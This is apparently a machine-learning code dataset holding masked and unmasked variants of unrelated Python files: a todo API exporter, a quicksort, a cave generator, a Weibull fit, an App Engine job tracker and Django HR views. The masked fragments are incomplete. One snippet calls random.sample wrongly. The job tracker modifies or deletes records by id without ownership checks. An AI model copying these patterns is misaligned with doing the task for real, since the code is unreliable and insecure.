reso_todos = ('https://jsonplaceholder.typicode.com/users/{}/todos'
.format(user['id']))
rq = requests.get(reso_todos).json()
list_tasks = []
for content in rq:
d_task = {}
d_task['task'] = content['title']
d_task['completed'] = content['completed']
d_task['username'] = user['username']
list_tasks.append(d_task)
d[user['id']] = list_tasks
with open('todo_all_employees.json', 'w') as f:
json.dump(d, f)
| <mask token>
import json
import requests
import sys
if __name__ == '__main__':
req = 'https://jsonplaceholder.typicode.com/todos'
response = requests.get(req).json()
d = {}
req_user = 'https://jsonplaceholder.typicode.com/users'
users = requests.get(req_user).json()
for user in users:
reso_todos = ('https://jsonplaceholder.typicode.com/users/{}/todos'
.format(user['id']))
rq = requests.get(reso_todos).json()
list_tasks = []
for content in rq:
d_task = {}
d_task['task'] = content['title']
d_task['completed'] = content['completed']
d_task['username'] = user['username']
list_tasks.append(d_task)
d[user['id']] = list_tasks
with open('todo_all_employees.json', 'w') as f:
json.dump(d, f)
| #!/usr/bin/python3
"""
request api and write in JSON file
all tasks todo for every users
"""
import json
import requests
import sys
if __name__ == "__main__":
req = "https://jsonplaceholder.typicode.com/todos"
response = requests.get(req).json()
d = {}
req_user = "https://jsonplaceholder.typicode.com/users"
users = requests.get(req_user).json()
for user in users:
reso_todos = "https://jsonplaceholder.typicode.com/users/{}/todos"\
.format(user['id'])
rq = requests.get(reso_todos).json()
list_tasks = []
for content in rq:
d_task = {}
d_task['task'] = content['title']
d_task['completed'] = content['completed']
d_task['username'] = user['username']
list_tasks.append(d_task)
d[user['id']] = list_tasks
with open('todo_all_employees.json', 'w') as f:
json.dump(d, f)
| null | [
0,
1,
2,
3
] |
1,625 | 24cd3a1a05a1cfa638b8264fd89b36ee63b29f89 | <mask token>
| <mask token>
setup(name='CoreMLModules', version='0.1.0', url=
'https://github.com/AfricasVoices/CoreMLModules', packages=[
'core_ml_modules'], setup_requires=['pytest-runner'], install_requires=
['numpy', 'scikit-learn', 'nltk'], tests_require=['pytest<=3.6.4'])
| from setuptools import setup
setup(name='CoreMLModules', version='0.1.0', url=
'https://github.com/AfricasVoices/CoreMLModules', packages=[
'core_ml_modules'], setup_requires=['pytest-runner'], install_requires=
['numpy', 'scikit-learn', 'nltk'], tests_require=['pytest<=3.6.4'])
| from setuptools import setup
setup(
name="CoreMLModules",
version="0.1.0",
url="https://github.com/AfricasVoices/CoreMLModules",
packages=["core_ml_modules"],
setup_requires=["pytest-runner"],
install_requires=["numpy", "scikit-learn", "nltk"],
tests_require=["pytest<=3.6.4"]
)
| null | [
0,
1,
2,
3
] |
1,626 | e7ef8debbff20cb178a3870b9618cbb0652af5af | #!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import urllib2, os, logging, webapp2, random
#use logging.info("") to print stuff
from google.appengine.ext import webapp
from webapp2_extras import sessions
from google.appengine.ext.webapp import template
from google.appengine.ext import db
from conf import USERS, SESSION_KEY
from google.appengine.ext.db import BadValueError
class Job(db.Model):
title = db.StringProperty()
link = db.LinkProperty()
notes = db.TextProperty()
location = db.StringProperty()
compensation = db.StringProperty()
user = db.StringProperty()
class BaseHandler(webapp2.RequestHandler):
def unset_session(self):
self.session['user'] = ""
def dispatch(self):
self.session_store = sessions.get_store(request=self.request)
try:
webapp2.RequestHandler.dispatch(self)
finally:
self.session_store.save_sessions(self.response)
@webapp2.cached_property
def session(self):
return self.session_store.get_session()
def render_restricted_template(self, view_filename, params={}):
if ('user' in self.session and self.session['user'] != ""):
self.render_template(view_filename, params)
else:
self.render_template('message.html', {'msg': 'Not Logged in.', 'login': True, 'Error': True})
def render_template(self, view_filename, params={}):
path = os.path.join(os.path.dirname(__file__), 'templates', view_filename)
self.response.out.write(template.render(path, params))
class MainHandler(BaseHandler):
def get(self):
jobs = db.GqlQuery("SELECT * FROM Job WHERE user =:username", username=self.session['user'])
jobs_wid = []
for job in jobs:
jobs_wid.append([job, job.key().id()])
self.render_restricted_template('index.html', {'jobs': jobs_wid})
class ActionHandler(BaseHandler):
def get(self):
self.render_restricted_template('index.html', {})
def post(self):
#modify param value
if self.request.get('action') == 'modify' and self.request.get('id') and self.request.get('param') and self.request.get('value'):
job = Job.get_by_id(int(self.request.get('id')))
setattr(job, self.request.get('param'), self.request.get('value'))
job.put()
elif self.request.get('action') == 'delete' and self.request.get('id'):
job = Job.get_by_id(int(self.request.get('id')))
job.delete()
self.render_restricted_template('index.html', {})
class AddJobHandler(BaseHandler):
def get(self):
self.render_restricted_template('index.html', {})
def post(self):
try:
if self.request.get('link'):
link = self.request.get('link')
else:
link = None
job = Job(title=self.request.get('title'), link=link, notes=self.request.get('notes'), location=self.request.get('location'), compensation=self.request.get('compensation'), user=self.session['user'])
job.put()
self.render_restricted_template('index.html', {})
except BadValueError:
self.render_template('message.html', {'msg': 'Invalid Link', 'login': False, 'Error': True})
class LoginHandler(BaseHandler):
def get(self):
self.render_template('message.html', {'msg': 'Not Logged in.', 'login': True, 'Error': True})
def post(self):
if self.request.get('username') in USERS and USERS[self.request.get('username')] == self.request.get('password'):
self.session['user'] = self.request.get('username')
self.render_template('index.html', {'login': True})
else:
self.render_template('message.html', {'msg': 'Incorrect Credentials.', 'login': True, 'Error': True})
class LogoutHandler(BaseHandler):
def get(self):
self.session['user'] = ""
self.render_template('message.html', {'msg': 'Successfully Logged Out.'})
config = {'webapp2_extras.sessions': {'secret_key': SESSION_KEY}}
app = webapp2.WSGIApplication([
webapp2.Route('/', MainHandler, name='home'),
webapp2.Route('/login', LoginHandler, name='login'),
webapp2.Route('/logout', LogoutHandler, name='logout'),
webapp2.Route('/action', ActionHandler, name='action'),
webapp2.Route('/addjob', AddJobHandler, name='addjob')
], config=config, debug=True) | null | null | null | null | [
0
] |
1,627 | 09a5c96b7f496aca6b34d7f0a83d5b1e182ca409 | def quick_sort(arr):
q_sort(arr, 0, len(arr) - 1)
def q_sort(arr, left, right):
if left < right:
pivot_index = partition(arr, left, right)
q_sort(arr, left, pivot_index - 1)
q_sort(arr, pivot_index + 1, right)
<mask token>
| def quick_sort(arr):
q_sort(arr, 0, len(arr) - 1)
def q_sort(arr, left, right):
if left < right:
pivot_index = partition(arr, left, right)
q_sort(arr, left, pivot_index - 1)
q_sort(arr, pivot_index + 1, right)
def partition(arr, left, right):
pivot = arr[left]
while left < right:
while left < right and arr[right] >= pivot:
right -= 1
arr[left] = arr[right]
while left < right and arr[left] <= pivot:
left += 1
arr[right] = arr[left]
arr[left] = pivot
return left
<mask token>
| def quick_sort(arr):
q_sort(arr, 0, len(arr) - 1)
def q_sort(arr, left, right):
if left < right:
pivot_index = partition(arr, left, right)
q_sort(arr, left, pivot_index - 1)
q_sort(arr, pivot_index + 1, right)
def partition(arr, left, right):
pivot = arr[left]
while left < right:
while left < right and arr[right] >= pivot:
right -= 1
arr[left] = arr[right]
while left < right and arr[left] <= pivot:
left += 1
arr[right] = arr[left]
arr[left] = pivot
return left
def partition_1(arr, low, high):
pivot = arr[high]
store_index = low
for i in range(low, high):
if arr[i] < pivot:
arr[store_index], arr[i] = arr[i], arr[store_index]
store_index += 1
arr[store_index], arr[high] = arr[high], arr[store_index]
return store_index
<mask token>
| def quick_sort(arr):
q_sort(arr, 0, len(arr) - 1)
def q_sort(arr, left, right):
if left < right:
pivot_index = partition(arr, left, right)
q_sort(arr, left, pivot_index - 1)
q_sort(arr, pivot_index + 1, right)
def partition(arr, left, right):
pivot = arr[left]
while left < right:
while left < right and arr[right] >= pivot:
right -= 1
arr[left] = arr[right]
while left < right and arr[left] <= pivot:
left += 1
arr[right] = arr[left]
arr[left] = pivot
return left
def partition_1(arr, low, high):
pivot = arr[high]
store_index = low
for i in range(low, high):
if arr[i] < pivot:
arr[store_index], arr[i] = arr[i], arr[store_index]
store_index += 1
arr[store_index], arr[high] = arr[high], arr[store_index]
return store_index
if __name__ == '__main__':
arr = [5, 9, 1, 11, 6, 7, 2, 4]
quick_sort(arr)
print(arr)
| def quick_sort(arr):
q_sort(arr, 0, len(arr) - 1)
def q_sort(arr, left, right):
if left < right:
pivot_index = partition(arr, left, right)
q_sort(arr, left, pivot_index - 1)
q_sort(arr, pivot_index + 1, right)
def partition(arr, left, right):
pivot = arr[left]
while left < right:
# 如果列表后边的数比基准数大或相等, 则前移一位直到有比基准数小的数出现
while left < right and arr[right] >= pivot:
right -= 1
# 如找到, 则把第 right 个元素赋值给 left 位置,此时表中 left 和 right 的元素相等
arr[left] = arr[right]
# # 减少下一个循环的一次比较
# if left < right:
# left += 1
# 同样的方式比较前半区
while left < right and arr[left] <= pivot:
left += 1
arr[right] = arr[left]
# if left < right:
# right -= 1
# 做完一轮比较之后, 列表被分成了两个半区, 并且 left=right , 需要将这个数设置回 pivot
arr[left] = pivot
return left
def partition_1(arr, low, high):
pivot = arr[high]
store_index = low # 位置 store_index 存储较小元素
for i in range(low, high):
# 当前元素小于或等于 pivot
if arr[i] < pivot:
arr[store_index], arr[i] = arr[i], arr[store_index]
store_index += 1
arr[store_index], arr[high] = arr[high], arr[store_index]
return store_index
if __name__ == '__main__':
# arr = [3, 44, 38, 5, 47, 15, 36, 26, 27, 2, 46, 4, 19, 50, 48]
arr = [5, 9, 1, 11, 6, 7, 2, 4]
quick_sort(arr)
print(arr)
| [
2,
3,
4,
5,
6
] |
1,628 | 7feac838f17ef1e4338190c0e8c284ed99369693 | <mask token>
def generateNoise():
caveMap = []
column = 1
row = 1
while column <= mapWidth:
while row <= mapHeight:
if (column == 1 or column == mapWidth or row == 1 or row ==
mapHeight):
caveMap.append([column, row, 1])
elif random.randrange(1, 100) <= fillPercent:
caveMap.append([column, row, 1])
else:
caveMap.append([column, row, 0])
row += 1
column += 1
row = 1
printCaveMap(caveMap)
return caveMap
<mask token>
def isWall(caveMap, column, row):
for cell in caveMap:
if cell[0] == column and cell[1] == row and cell[2] == 1:
return True
elif cell[0] == column and cell[1] == row and cell[2] == 0:
return False
else:
continue
def findNeighbors(caveMap, column, row):
neighbors = 0
if isOutOfBounds(column - 1, row - 1):
neighbors += 1
elif isWall(caveMap, column - 1, row - 1):
neighbors += 1
if isOutOfBounds(column, row - 1):
neighbors += 1
elif isWall(caveMap, column, row - 1):
neighbors += 1
if isOutOfBounds(column + 1, row - 1):
neighbors += 1
elif isWall(caveMap, column + 1, row - 1):
neighbors += 1
if isOutOfBounds(column - 1, row):
neighbors += 1
elif isWall(caveMap, column - 1, row):
neighbors += 1
if isOutOfBounds(column + 1, row):
neighbors += 1
elif isWall(caveMap, column + 1, row):
neighbors += 1
if isOutOfBounds(column - 1, row + 1):
neighbors += 1
elif isWall(caveMap, column - 1, row + 1):
neighbors += 1
if isOutOfBounds(column, row + 1):
neighbors += 1
elif isWall(caveMap, column, row + 1):
neighbors += 1
if isOutOfBounds(column + 1, row + 1):
neighbors += 1
elif isWall(caveMap, column + 1, row + 1):
neighbors += 1
return neighbors
def runGeneration(caveMap, generations):
i = 0
for i in range(0, generations):
start_time = time.time()
for cell in caveMap:
if findNeighbors(caveMap, cell[0], cell[1]) < 3:
cell[2] = 0
elif findNeighbors(caveMap, cell[0], cell[1]) > 5:
cell[2] = 1
printCaveMap(caveMap)
end_time = time.time()
print(end_time - start_time, ' seconds')
return caveMap
<mask token>
def main():
caveMap = generateNoise()
runGeneration(caveMap, 2)
<mask token>
| <mask token>
def generateNoise():
caveMap = []
column = 1
row = 1
while column <= mapWidth:
while row <= mapHeight:
if (column == 1 or column == mapWidth or row == 1 or row ==
mapHeight):
caveMap.append([column, row, 1])
elif random.randrange(1, 100) <= fillPercent:
caveMap.append([column, row, 1])
else:
caveMap.append([column, row, 0])
row += 1
column += 1
row = 1
printCaveMap(caveMap)
return caveMap
<mask token>
def isWall(caveMap, column, row):
for cell in caveMap:
if cell[0] == column and cell[1] == row and cell[2] == 1:
return True
elif cell[0] == column and cell[1] == row and cell[2] == 0:
return False
else:
continue
def findNeighbors(caveMap, column, row):
neighbors = 0
if isOutOfBounds(column - 1, row - 1):
neighbors += 1
elif isWall(caveMap, column - 1, row - 1):
neighbors += 1
if isOutOfBounds(column, row - 1):
neighbors += 1
elif isWall(caveMap, column, row - 1):
neighbors += 1
if isOutOfBounds(column + 1, row - 1):
neighbors += 1
elif isWall(caveMap, column + 1, row - 1):
neighbors += 1
if isOutOfBounds(column - 1, row):
neighbors += 1
elif isWall(caveMap, column - 1, row):
neighbors += 1
if isOutOfBounds(column + 1, row):
neighbors += 1
elif isWall(caveMap, column + 1, row):
neighbors += 1
if isOutOfBounds(column - 1, row + 1):
neighbors += 1
elif isWall(caveMap, column - 1, row + 1):
neighbors += 1
if isOutOfBounds(column, row + 1):
neighbors += 1
elif isWall(caveMap, column, row + 1):
neighbors += 1
if isOutOfBounds(column + 1, row + 1):
neighbors += 1
elif isWall(caveMap, column + 1, row + 1):
neighbors += 1
return neighbors
def runGeneration(caveMap, generations):
i = 0
for i in range(0, generations):
start_time = time.time()
for cell in caveMap:
if findNeighbors(caveMap, cell[0], cell[1]) < 3:
cell[2] = 0
elif findNeighbors(caveMap, cell[0], cell[1]) > 5:
cell[2] = 1
printCaveMap(caveMap)
end_time = time.time()
print(end_time - start_time, ' seconds')
return caveMap
def printCaveMap(caveMap):
i = 1
for item in caveMap:
if i == mapWidth + 1:
print('\r')
i = 1
if item[2] == 1:
print(' # ', end='')
else:
print(' ', end='')
i += 1
print('\n', '\n')
def main():
caveMap = generateNoise()
runGeneration(caveMap, 2)
<mask token>
| <mask token>
def generateNoise():
caveMap = []
column = 1
row = 1
while column <= mapWidth:
while row <= mapHeight:
if (column == 1 or column == mapWidth or row == 1 or row ==
mapHeight):
caveMap.append([column, row, 1])
elif random.randrange(1, 100) <= fillPercent:
caveMap.append([column, row, 1])
else:
caveMap.append([column, row, 0])
row += 1
column += 1
row = 1
printCaveMap(caveMap)
return caveMap
def isOutOfBounds(column, row):
if column < 1 or row < 1:
return True
elif column > mapWidth or row > mapHeight:
return True
else:
return False
def isWall(caveMap, column, row):
for cell in caveMap:
if cell[0] == column and cell[1] == row and cell[2] == 1:
return True
elif cell[0] == column and cell[1] == row and cell[2] == 0:
return False
else:
continue
def findNeighbors(caveMap, column, row):
neighbors = 0
if isOutOfBounds(column - 1, row - 1):
neighbors += 1
elif isWall(caveMap, column - 1, row - 1):
neighbors += 1
if isOutOfBounds(column, row - 1):
neighbors += 1
elif isWall(caveMap, column, row - 1):
neighbors += 1
if isOutOfBounds(column + 1, row - 1):
neighbors += 1
elif isWall(caveMap, column + 1, row - 1):
neighbors += 1
if isOutOfBounds(column - 1, row):
neighbors += 1
elif isWall(caveMap, column - 1, row):
neighbors += 1
if isOutOfBounds(column + 1, row):
neighbors += 1
elif isWall(caveMap, column + 1, row):
neighbors += 1
if isOutOfBounds(column - 1, row + 1):
neighbors += 1
elif isWall(caveMap, column - 1, row + 1):
neighbors += 1
if isOutOfBounds(column, row + 1):
neighbors += 1
elif isWall(caveMap, column, row + 1):
neighbors += 1
if isOutOfBounds(column + 1, row + 1):
neighbors += 1
elif isWall(caveMap, column + 1, row + 1):
neighbors += 1
return neighbors
def runGeneration(caveMap, generations):
i = 0
for i in range(0, generations):
start_time = time.time()
for cell in caveMap:
if findNeighbors(caveMap, cell[0], cell[1]) < 3:
cell[2] = 0
elif findNeighbors(caveMap, cell[0], cell[1]) > 5:
cell[2] = 1
printCaveMap(caveMap)
end_time = time.time()
print(end_time - start_time, ' seconds')
return caveMap
def printCaveMap(caveMap):
i = 1
for item in caveMap:
if i == mapWidth + 1:
print('\r')
i = 1
if item[2] == 1:
print(' # ', end='')
else:
print(' ', end='')
i += 1
print('\n', '\n')
def main():
caveMap = generateNoise()
runGeneration(caveMap, 2)
if __name__ == '__main__':
main()
| <mask token>
mapHeight = 30
mapWidth = 30
fillPercent = 45
def generateNoise():
caveMap = []
column = 1
row = 1
while column <= mapWidth:
while row <= mapHeight:
if (column == 1 or column == mapWidth or row == 1 or row ==
mapHeight):
caveMap.append([column, row, 1])
elif random.randrange(1, 100) <= fillPercent:
caveMap.append([column, row, 1])
else:
caveMap.append([column, row, 0])
row += 1
column += 1
row = 1
printCaveMap(caveMap)
return caveMap
def isOutOfBounds(column, row):
if column < 1 or row < 1:
return True
elif column > mapWidth or row > mapHeight:
return True
else:
return False
def isWall(caveMap, column, row):
for cell in caveMap:
if cell[0] == column and cell[1] == row and cell[2] == 1:
return True
elif cell[0] == column and cell[1] == row and cell[2] == 0:
return False
else:
continue
def findNeighbors(caveMap, column, row):
neighbors = 0
if isOutOfBounds(column - 1, row - 1):
neighbors += 1
elif isWall(caveMap, column - 1, row - 1):
neighbors += 1
if isOutOfBounds(column, row - 1):
neighbors += 1
elif isWall(caveMap, column, row - 1):
neighbors += 1
if isOutOfBounds(column + 1, row - 1):
neighbors += 1
elif isWall(caveMap, column + 1, row - 1):
neighbors += 1
if isOutOfBounds(column - 1, row):
neighbors += 1
elif isWall(caveMap, column - 1, row):
neighbors += 1
if isOutOfBounds(column + 1, row):
neighbors += 1
elif isWall(caveMap, column + 1, row):
neighbors += 1
if isOutOfBounds(column - 1, row + 1):
neighbors += 1
elif isWall(caveMap, column - 1, row + 1):
neighbors += 1
if isOutOfBounds(column, row + 1):
neighbors += 1
elif isWall(caveMap, column, row + 1):
neighbors += 1
if isOutOfBounds(column + 1, row + 1):
neighbors += 1
elif isWall(caveMap, column + 1, row + 1):
neighbors += 1
return neighbors
def runGeneration(caveMap, generations):
i = 0
for i in range(0, generations):
start_time = time.time()
for cell in caveMap:
if findNeighbors(caveMap, cell[0], cell[1]) < 3:
cell[2] = 0
elif findNeighbors(caveMap, cell[0], cell[1]) > 5:
cell[2] = 1
printCaveMap(caveMap)
end_time = time.time()
print(end_time - start_time, ' seconds')
return caveMap
def printCaveMap(caveMap):
i = 1
for item in caveMap:
if i == mapWidth + 1:
print('\r')
i = 1
if item[2] == 1:
print(' # ', end='')
else:
print(' ', end='')
i += 1
print('\n', '\n')
def main():
caveMap = generateNoise()
runGeneration(caveMap, 2)
if __name__ == '__main__':
main()
| #/usr/bin/env python
#v0.2
import random, time
mapHeight = 30
mapWidth = 30
fillPercent = 45
def generateNoise():
#generate a grid of cells with height = mapHeight and width = mapWidth with each cell either "walls" (true) or "floors" (false)
#border is guaranteed to be walls and all other spaces have a fillPercent chance of being walls
caveMap = []
column = 1
row = 1
while column <= mapWidth:
while row <= mapHeight:
if (column == 1) or (column == mapWidth) or (row == 1) or (row == mapHeight):
caveMap.append([column, row, 1])
else:
if random.randrange(1,100) <= fillPercent:
caveMap.append([column, row, 1])
else:
caveMap.append([column,row,0])
row += 1
column += 1
row = 1
printCaveMap(caveMap)
return caveMap
def isOutOfBounds(column, row):
#find if a cell is out of bounds based on map size
if column < 1 or row < 1:
return True
elif column > mapWidth or row > mapHeight:
return True
else:
return False
def isWall(caveMap, column, row):
#determine if a cell is a wall or not
#very inefficient - might have to loop through entire list
for cell in caveMap:
if cell[0] == column and cell[1] == row and cell[2] == 1:
return True
elif cell[0] == column and cell[1] == row and cell[2] == 0:
return False
else:
continue
def findNeighbors(caveMap, column, row):
#find the number of walls in a 3x3 pattern around a given cell (determined by column and row)
#there must be a more efficient way to do this, but here we are
neighbors = 0
if isOutOfBounds(column -1, row -1):
neighbors += 1
elif isWall(caveMap, column -1, row -1):
neighbors += 1
if isOutOfBounds(column, row -1):
neighbors += 1
elif isWall(caveMap, column, row -1):
neighbors += 1
if isOutOfBounds(column +1, row -1):
neighbors += 1
elif isWall(caveMap, column +1, row -1):
neighbors += 1
if isOutOfBounds(column -1, row):
neighbors += 1
elif isWall(caveMap, column -1, row):
neighbors += 1
if isOutOfBounds(column +1, row):
neighbors += 1
elif isWall(caveMap, column +1, row):
neighbors += 1
if isOutOfBounds(column -1, row +1):
neighbors += 1
elif isWall(caveMap, column -1, row +1):
neighbors += 1
if isOutOfBounds(column, row +1):
neighbors += 1
elif isWall(caveMap, column, row +1):
neighbors += 1
if isOutOfBounds(column +1, row +1):
neighbors += 1
elif isWall(caveMap, column +1, row +1):
neighbors += 1
return neighbors
def runGeneration (caveMap, generations):
#smooth out random noise using modified 4-5 cellular automata rules
#the entire process is pretty inefficient - it has to loop through the entire list as many as
#(mapWidth * mapHeight * 8) times for potentially millions of comparisons
i =0
for i in range(0, generations):
start_time = time.time()
for cell in caveMap:
if findNeighbors(caveMap,cell[0],cell[1]) < 3:
cell[2] = 0
elif findNeighbors(caveMap, cell[0], cell[1]) > 5:
cell[2] = 1
printCaveMap(caveMap)
end_time = time.time()
print(end_time - start_time, " seconds")
return caveMap
def printCaveMap(caveMap):
#print the map by displaying a grid of characters where # = walls and spaces = floors
#just uses mapWidth to insert returns, very agnostic about the column/row of a cell
i = 1
for item in caveMap:
if i == mapWidth + 1:
print('\r')
i = 1
if item[2] == 1:
print(" # ", end="")
else:
print(" ", end="")
i += 1
print("\n", "\n")
def main():
caveMap = generateNoise()
runGeneration(caveMap, 2)
if __name__ == "__main__":
main() | [
5,
6,
8,
9,
11
] |
1,629 | d39f6fca80f32a4d13764eb5cfb29999785b1d16 | <mask token>
| <mask token>
print(my_randoms)
| <mask token>
my_randoms = random.sample(100, 10)
print(my_randoms)
| import random
my_randoms = random.sample(100, 10)
print(my_randoms)
| null | [
0,
1,
2,
3
] |
1,630 | 53509d826b82211bac02ea5f545802007b06781c | <mask token>
| import ludwig.schema.decoders.base
import ludwig.schema.decoders.sequence_decoders
| # Register all decoders
import ludwig.schema.decoders.base
import ludwig.schema.decoders.sequence_decoders # noqa
| null | null | [
0,
1,
2
] |
1,631 | b10d3d8d0ded0d2055c1abdaf40a97abd4cb2cb8 | <mask token>
def fit(x, iters=1000, eps=1e-06):
"""
Fits a 2-parameter Weibull distribution to the given data using maximum-likelihood estimation.
:param x: 1d-ndarray of samples from an (unknown) distribution. Each value must satisfy x > 0.
:param iters: Maximum number of iterations
:param eps: Stopping criterion. Fit is stopped ff the change within two iterations is smaller than eps.
:return: Tuple (Shape, Scale) which can be (NaN, NaN) if a fit is impossible.
Impossible fits may be due to 0-values in x.
"""
ln_x = np.log(x)
k = 1.0
k_t_1 = k
for t in range(iters):
x_k = x ** k
x_k_ln_x = x_k * ln_x
ff = np.sum(x_k_ln_x)
fg = np.sum(x_k)
f = ff / fg - np.mean(ln_x) - 1.0 / k
ff_prime = np.sum(x_k_ln_x * ln_x)
fg_prime = ff
f_prime = ff_prime / fg - ff / fg * fg_prime / fg + 1.0 / (k * k)
k -= f / f_prime
if np.isnan(f):
return np.nan, np.nan
if abs(k - k_t_1) < eps:
break
k_t_1 = k
lam = np.mean(x ** k) ** (1.0 / k)
return k, lam
<mask token>
| <mask token>
def fit(x, iters=1000, eps=1e-06):
"""
Fits a 2-parameter Weibull distribution to the given data using maximum-likelihood estimation.
:param x: 1d-ndarray of samples from an (unknown) distribution. Each value must satisfy x > 0.
:param iters: Maximum number of iterations
:param eps: Stopping criterion. Fit is stopped ff the change within two iterations is smaller than eps.
:return: Tuple (Shape, Scale) which can be (NaN, NaN) if a fit is impossible.
Impossible fits may be due to 0-values in x.
"""
ln_x = np.log(x)
k = 1.0
k_t_1 = k
for t in range(iters):
x_k = x ** k
x_k_ln_x = x_k * ln_x
ff = np.sum(x_k_ln_x)
fg = np.sum(x_k)
f = ff / fg - np.mean(ln_x) - 1.0 / k
ff_prime = np.sum(x_k_ln_x * ln_x)
fg_prime = ff
f_prime = ff_prime / fg - ff / fg * fg_prime / fg + 1.0 / (k * k)
k -= f / f_prime
if np.isnan(f):
return np.nan, np.nan
if abs(k - k_t_1) < eps:
break
k_t_1 = k
lam = np.mean(x ** k) ** (1.0 / k)
return k, lam
def my_test():
weibull = np.random.weibull(2.0, 100000)
x = 2 * weibull
mle_shape, mle_scale = fit(x)
x.sort()
print(mle_shape)
print(mle_scale)
ydata = stats.weibull_min.pdf(np.linspace(0, x.max(), 10), mle_shape, 0,
mle_scale)
plt.plot(np.linspace(0, x.max(), 10), ydata, '-')
plt.hist(x, bins=np.linspace(0, x.max(), 10), normed=True, alpha=0.5)
plt.show()
<mask token>
| <mask token>
def fit(x, iters=1000, eps=1e-06):
"""
Fits a 2-parameter Weibull distribution to the given data using maximum-likelihood estimation.
:param x: 1d-ndarray of samples from an (unknown) distribution. Each value must satisfy x > 0.
:param iters: Maximum number of iterations
:param eps: Stopping criterion. Fit is stopped ff the change within two iterations is smaller than eps.
:return: Tuple (Shape, Scale) which can be (NaN, NaN) if a fit is impossible.
Impossible fits may be due to 0-values in x.
"""
ln_x = np.log(x)
k = 1.0
k_t_1 = k
for t in range(iters):
x_k = x ** k
x_k_ln_x = x_k * ln_x
ff = np.sum(x_k_ln_x)
fg = np.sum(x_k)
f = ff / fg - np.mean(ln_x) - 1.0 / k
ff_prime = np.sum(x_k_ln_x * ln_x)
fg_prime = ff
f_prime = ff_prime / fg - ff / fg * fg_prime / fg + 1.0 / (k * k)
k -= f / f_prime
if np.isnan(f):
return np.nan, np.nan
if abs(k - k_t_1) < eps:
break
k_t_1 = k
lam = np.mean(x ** k) ** (1.0 / k)
return k, lam
def my_test():
weibull = np.random.weibull(2.0, 100000)
x = 2 * weibull
mle_shape, mle_scale = fit(x)
x.sort()
print(mle_shape)
print(mle_scale)
ydata = stats.weibull_min.pdf(np.linspace(0, x.max(), 10), mle_shape, 0,
mle_scale)
plt.plot(np.linspace(0, x.max(), 10), ydata, '-')
plt.hist(x, bins=np.linspace(0, x.max(), 10), normed=True, alpha=0.5)
plt.show()
if __name__ == '__main__':
my_test()
| import numpy as np
import matplotlib.pyplot as plt
from scipy import stats
def fit(x, iters=1000, eps=1e-06):
"""
Fits a 2-parameter Weibull distribution to the given data using maximum-likelihood estimation.
:param x: 1d-ndarray of samples from an (unknown) distribution. Each value must satisfy x > 0.
:param iters: Maximum number of iterations
:param eps: Stopping criterion. Fit is stopped ff the change within two iterations is smaller than eps.
:return: Tuple (Shape, Scale) which can be (NaN, NaN) if a fit is impossible.
Impossible fits may be due to 0-values in x.
"""
ln_x = np.log(x)
k = 1.0
k_t_1 = k
for t in range(iters):
x_k = x ** k
x_k_ln_x = x_k * ln_x
ff = np.sum(x_k_ln_x)
fg = np.sum(x_k)
f = ff / fg - np.mean(ln_x) - 1.0 / k
ff_prime = np.sum(x_k_ln_x * ln_x)
fg_prime = ff
f_prime = ff_prime / fg - ff / fg * fg_prime / fg + 1.0 / (k * k)
k -= f / f_prime
if np.isnan(f):
return np.nan, np.nan
if abs(k - k_t_1) < eps:
break
k_t_1 = k
lam = np.mean(x ** k) ** (1.0 / k)
return k, lam
def my_test():
weibull = np.random.weibull(2.0, 100000)
x = 2 * weibull
mle_shape, mle_scale = fit(x)
x.sort()
print(mle_shape)
print(mle_scale)
ydata = stats.weibull_min.pdf(np.linspace(0, x.max(), 10), mle_shape, 0,
mle_scale)
plt.plot(np.linspace(0, x.max(), 10), ydata, '-')
plt.hist(x, bins=np.linspace(0, x.max(), 10), normed=True, alpha=0.5)
plt.show()
if __name__ == '__main__':
my_test()
| import numpy as np
import matplotlib.pyplot as plt
from scipy import stats
def fit(x, iters=1000, eps=1e-6):
"""
Fits a 2-parameter Weibull distribution to the given data using maximum-likelihood estimation.
:param x: 1d-ndarray of samples from an (unknown) distribution. Each value must satisfy x > 0.
:param iters: Maximum number of iterations
:param eps: Stopping criterion. Fit is stopped ff the change within two iterations is smaller than eps.
:return: Tuple (Shape, Scale) which can be (NaN, NaN) if a fit is impossible.
Impossible fits may be due to 0-values in x.
"""
# fit k via MLE
ln_x = np.log(x)
k = 1.
k_t_1 = k
for t in range(iters):
x_k = x ** k
x_k_ln_x = x_k * ln_x
ff = np.sum(x_k_ln_x)
fg = np.sum(x_k)
f = ff / fg - np.mean(ln_x) - (1. / k)
# Calculate second derivative d^2f/dk^2
ff_prime = np.sum(x_k_ln_x * ln_x)
fg_prime = ff
f_prime = (ff_prime / fg - (ff / fg * fg_prime / fg)) + (
1. / (k * k))
# Newton-Raphson method k = k - f(k;x)/f'(k;x)
k -= f / f_prime
if np.isnan(f):
return np.nan, np.nan
if abs(k - k_t_1) < eps:
break
k_t_1 = k
lam = np.mean(x ** k) ** (1.0 / k)
return k, lam
def my_test():
weibull = np.random.weibull(2.0, 100000)
x = 2 * weibull
mle_shape, mle_scale = fit(x)
x.sort()
print(mle_shape)
print(mle_scale)
# p0, p1, p2 = stats.weibull_min.fit(x, floc=0)
# print(p0, p1, p2)
ydata = stats.weibull_min.pdf(np.linspace(0, x.max(), 10), mle_shape, 0,
mle_scale)
plt.plot(np.linspace(0, x.max(), 10), ydata, '-')
plt.hist(x, bins=np.linspace(0, x.max(), 10), normed=True, alpha=0.5)
plt.show()
if __name__ == '__main__':
my_test()
| [
1,
2,
3,
4,
5
] |
1,632 | 7c6ac2837751703ac4582ee81c29ccf67b8277bc | <mask token>
class UpdatePerformanceView(SuccessMessageMixin, UpdateView):
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
class DetailPerformanceView(DetailView):
model = Performance
context_object_name = 'performance'
template_name = 'hrm/performance/performance_details.html'
def get_context_data(self, **kwargs):
context = super(DetailPerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
class DeletePerformanceView(SuccessMessageMixin, DeleteView):
model = Performance
success_message = 'Successfully! Deleted an appraisal.'
success_url = reverse_lazy('hrm:perfom_list')
template_name = 'hrm/performance/performance_delete.html'
